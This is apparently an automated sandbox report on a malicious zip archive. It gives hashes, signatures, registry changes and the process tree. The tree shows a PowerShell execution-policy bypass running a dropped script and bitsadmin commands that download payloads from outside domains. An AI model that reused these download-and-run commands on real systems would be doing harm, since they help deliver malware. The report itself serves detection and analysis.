Analysis
-
max time kernel
326s -
max time network
332s -
platform
windows11-21h2_x64 -
resource
win11-20241007-it -
resource tags
arch:x64arch:x86image:win11-20241007-itlocale:it-itos:windows11-21h2-x64systemwindows -
submitted
29-11-2024 11:05
Static task
static1
General
-
Target
ckJTQEOKC.zip
-
Size
20KB
-
MD5
a8fd65d74a9739b23c7e364df251b4e5
-
SHA1
fe8d2606f65a2cf08213786576ecfb20e4e6eba3
-
SHA256
32f821e84b91cdd2e998be739eb5b9d2e435827b4be84c54be34ce44a6e2ec31
-
SHA512
27632f81f83491ca628b0210a9eb28bbbda30a718596eb8e216417f8467e971d9bdc6ede3af7163ea5524fc780722b5e1d3eb6fa4eb69c9284789b7d13727ac4
-
SSDEEP
384:CuInQrtM9vrxKnB4AvyszfOiSr+p51d74AwsN3V/oQkUYP4ZqkqTZNLFzNF:ung8jEOAtOtw5v8ATJVFny4zqTZtFzP
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 2768 bitsadmin.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 416 2768 bitsadmin.exe 87 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 1692 bitsadmin.exe 416 bitsadmin.exe -
Drops file in System32 directory 1 IoCs
Processes:
mmc.exedescription ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe -
Modifies registry class 9 IoCs
Processes:
BackgroundTransferHost.exeBackgroundTransferHost.exeOpenWith.exeOpenWith.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid Process 2628 powershell.exe 2628 powershell.exe 2628 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
7zFM.exemmc.exepid Process 4064 7zFM.exe 1952 mmc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exepowershell.exemmc.exedescription pid Process Token: SeRestorePrivilege 4064 7zFM.exe Token: 35 4064 7zFM.exe Token: SeSecurityPrivilege 4064 7zFM.exe Token: SeDebugPrivilege 2628 powershell.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe Token: 33 1952 mmc.exe Token: SeIncBasePriorityPrivilege 1952 mmc.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid Process 4064 7zFM.exe 4064 7zFM.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
OpenWith.exeOpenWith.exemmc.exepid Process 2664 OpenWith.exe 2904 OpenWith.exe 1952 mmc.exe 1952 mmc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 2628 wrote to memory of 2064 2628 powershell.exe 88 PID 2628 wrote to memory of 2064 2628 powershell.exe 88 PID 2628 wrote to memory of 4120 2628 powershell.exe 90 PID 2628 wrote to memory of 4120 2628 powershell.exe 90 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4064
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:4104
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1292
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2664
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"1⤵PID:876
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"1⤵PID:3480
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1'"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:2064
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:4120
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer AlLWrT /priority FOREGROUND "https://ghryj.eu/post//213b167960f52c6124c47a5e792c6af8.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:1692
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer ArwCOW /priority FOREGROUND "https://uhfb.eu/post//213b167960f52c6124c47a5e792c6af8.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:416
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:2000
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1952
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:3260
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ce6e736f-bdeb-46da-947e-944ec8a31ac4.down_data
Filesize121KB
MD5c2c241c1111d82bf82a4b92f3313d801
SHA1f822956f60c463000e5aaaeccf8b99f551179250
SHA2562081dc0f876ba518493f98bc18988ebe6cc6c23d9d963b5c4bb5c9ecef1f9f29
SHA51204f745fa497c8115bb76b42bac6e03b7a0edd394f1c4a62f329015c545bba1bc9b517b7941806bcd23e84bcd289316649c1cbd9c6804cc83dce62dc26655cd7f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5fb2d4b4538f231805a677bf1fdae7618
SHA19af3e31cad8f69e7d61f81005f8d7bb615ceea05
SHA25607bd6fa0bfb02d25cb31d8d9bb31653912671394c0fb1e8b10296682448627f2
SHA512d2fecf45f070e5cd752afdc6b229ffe6027ee12c726e98cc867ceb19990f964cd084de24312530c9d65a9b7ad7ad51d3d9a82c444d56a5a8cb78d65a636b6f05
-
Filesize
32B
MD5c5f79e50e9f1426aed3a210a3a5e8c4d
SHA17c8dfd39f669d241205219f066a022e028749d8e
SHA25689e9165ac6d056ca646a831e17d0c0f8877a7ebc9adba1665be6a6b60d9636aa
SHA51220ac36e6a588077a038c894ebc0bd53966210b94706674e8ebc5e852463123c7f6a1255769949c29e70e4c75d179af3dfc77501cd5c7c3d6fbf0d92453074d41
-
Filesize
2KB
MD59d6d8a084805bbf5d22507780d14e8f4
SHA127ebc6c5948855d6b5a7f1c5422a3be6a4a1e77a
SHA2569092a282a5c56c0a19713fd3067b528efae5b27e9faa737c87a9bbf6a566cc5e
SHA512a8142d16469fb415ad3f9212d52f0aadde797876e7735f3faebd79b57acd04688726e83047c808851ea9394b14dca0dad8c33a1e7695c4ce2a768d46a2f3597b
-
Filesize
874B
MD5c63ba33fb5afa2b84f98355c5acaea1c
SHA13ae2b38ea5a41352c11f70f676d78ad8b129101a
SHA256de0f8fb2de75f6ed3645ed8b36bf947ccbbe834adfcc4eff7740ec5f857a18b8
SHA512e0d63e8d562086c8a04273dfd7c969a70d796ef412f282b61c6320c404e58bfa213a84b56e6f4af56daae83bdfc680c00d537a6a7ead16132cb7dfbfcbeb7a13
-
Filesize
1KB
MD56b831ce8380c693ee6070ad424c9f92b
SHA1b87e2ef196383c246b996c4764e328d523b5c5b7
SHA256a65d23c0df6c750741bb63dee3564ea44462a07050f54a3b585d2c0c4b943e35
SHA512d333149446bd5e83310037b293b1cd73d3a2a15fa9b10ccbcda5fcac70b67e53e86aea4b7c7e0f567106ba3ca45c9856ccc69db7fd75b2d272397e92abf503e4
-
Filesize
95KB
MD5960716f6d0c819d551f68b970faff1f9
SHA1f23ca0bafec43bd8ba899190d290ab9db97b7b07
SHA256a83be5df3bb0b2b83a3727b50d0ebd74b8d0ef425a29f1352095260e12569192
SHA51250fc39e4a1d3cb91ebc76dfe1eaf5f32fb4871957d57d67c0bbde29dd0f97412f945db442a4f95b3b7f69f1148fe68df7f76621493ad64f742052b333fbe5f25
-
Filesize
16B
MD549fa9b3510c1cbf6d6df2f4a2f9f8e65
SHA13c1c22697e4370100ef87a52084d7c14fbf657d3
SHA256fcbccd7b328d9270a0f3820ecf622f6e14c09df6061f2275cb9524673b681acf
SHA5128870d64fb90035f6a8735c1bc8452ef516fd26de8472bdd4fc2e8d23a1a4b65566e954b1e3711a460ece543325389a487fdfc5ac477af8617b658e930ffd721f